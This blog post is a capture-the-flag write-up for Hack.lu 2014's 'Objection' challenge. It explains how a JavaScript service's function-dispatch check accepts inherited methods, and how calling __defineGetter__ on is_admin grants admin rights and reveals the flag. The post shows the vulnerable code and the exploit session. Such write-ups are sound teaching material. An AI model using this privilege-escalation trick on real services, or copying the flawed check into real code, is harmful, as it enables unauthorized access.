---
layout: post
title: "Objection"
date: 2014-10-23
ctf: Hack.lu 2014
author: Break
---

## Description

This guard talks a weird dialect. And why does he talk in such a complicated way? [Download](http://afnom.net/assets/2014/objection_4966674d17ff296939c0e3dfccfe87ed.co)

nc wildwildweb.fluxfingers.net 1408

## Solution

We were able to translate the code into JavaScript using LiveScript: [objection.js](http://afnom.net/assets/2014/objection.js)

When looking at the code, the following line is vulnerable.

{% highlight js %}
if (typeof client_context[funcname] !== 'function') {
        return con.write("error: unknown function " + funcname + "\n");
}
{% endhighlight %}

It only checks if the function `funcname` exists. But this also includes inherited functions
of the object `client_context` like e. g. `toString()`.

We, therefore, tried to redefine functions using `eval()`, lamdba-functions, `__defineSetter__`
and succeeded with `__defineGetter__`.

`__defineGetter__(name, function)` overwrites a label with a function and makes it into a getter.
The resulting "function" can be used as a normal variable:

{% highlight js %}
var finite = {}
finite.__defineGetter__("monkeys", function(){return "monkeys rock!";}
console.log(finite.monkeys) //notice the missing brackets - not: finite.monkeys()
//prints "monkeys rock!" to the console
{% endhighlight %}


The only problem is that we do not control the second parameter. The function is
given in the code:

{% highlight js %}
client_context[funcname](args, function(it){
        return con.write(it + "\n");
});
{% endhighlight %}

But, since it usually succeeds to write to the connection, it returns true!

So we used `__defineGetter__` to overwrite the variable `is_admin` in order to gain admin
privileges.

{% highlight js %}
hello!
__defineGetter__ is_admin
get_token
undefined
The current token is flag{real_cowboys_dont_use_object_create_null}
{% endhighlight %}

`__defineGetter__ is_admin` overwrites the variable `is_admin` with a getter which uses the
next argument - here: `function(it){return con.write(it + "\n");}` - and always returns true.

The flag was afterwards retrieved for 150+80 points using `get_token`.

(joint work Chris, Mike)